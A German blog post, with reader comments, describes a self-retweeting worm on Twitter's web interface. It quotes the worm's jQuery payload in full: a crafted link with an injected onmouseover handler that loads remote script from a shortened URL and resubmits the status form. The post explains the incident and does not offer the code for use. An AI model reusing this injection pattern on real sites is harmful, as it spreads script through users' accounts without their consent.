Select Page

Twitter. Endlosschleife. #status Bug.

Twitter. Endlosschleife. #status Bug.

Gerade gesehen wie sich die Timeline mit JavaScript code gefüllt hat. Anscheinend hat Twitter das mit dem „New Twitter“ noch nicht so ganz im Griff. Ein einfaches eingeschleustes Skript nutzt den Mouse-Over Effekt um sich selbst aufzurufen und zu retweeten.

Wer über das Webinterface seine Tweets abruft löst somit eine Endlosschleife (Loophole) aus in der folgendes Script immer wieder aufgerufen wird, da es sich selbst retweetet:

$('#status').
val("http://t.co/@\"style=\"font-size:999999999999px;\"
onmouseover=\"$.getScript('http:\\u002f\\u002fis.gd\\u002ffl9A7')\"/");
$('.status-update-form').submit();

Die Quelle hinter is.gd/fl9a7 (mittlerweile deaktiviert), ist ein Server in Russland (lexasoft.jino-net.ru) der im Grunde wieder das gleiche Script nachlädt und dann ausführt.

Ich schau mir das mal die Tage etwas genauer an.

About The Author

Heiko

BüroAmMeer. Fotografiert gern. Produktmanager, Projektleiter, Softwareentwickler und Game Designer, je nach Tageszeit, Erfordernis, Lust und Laune. Auswanderer, Roadsterliebhaber.

9 Comments

  1. Der Applejünger

    Du sach´ma´…. Haben die Jungs aus deinem Büro damit zu tun???? 😛

    Antworten
    • Heiko

      Sie beteuern ihre Unschuld! :-p

      Antworten
  2. MacSchlumpf

    Und i hab mich schon gewundert, warum so viele so ein „Unsinn“ posten.
    Danke für den Hinweis 🙂

    Antworten
    • Heiko

      Amüsant wie schnell das rumgeht. Hätte nicht gedacht das soviele Leute doch noch über den Browser twittern.

      Antworten
    • Heiko

      Cooler Avatar übrigens. 😉

      Antworten
  3. Judy

    Mir fällt sowas nie auf. Ich twittere auch immer nur über Tweet Deck oder das iPhone… 😉

    Antworten
    • Heiko

      Da hättest Du dann nur lustigen Code gesehen. War hier bei mir auch so.

      Antworten
  4. Windowsbunny

    Dank dieser Sache durfte ich jetzt DestroyTwitter kennen und lieben lernen.

    Antworten
    • Heiko

      DestroyTwitter ist schon ein interessanter Name für einen Twitter Client?

      Antworten

Leave a reply

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Instagram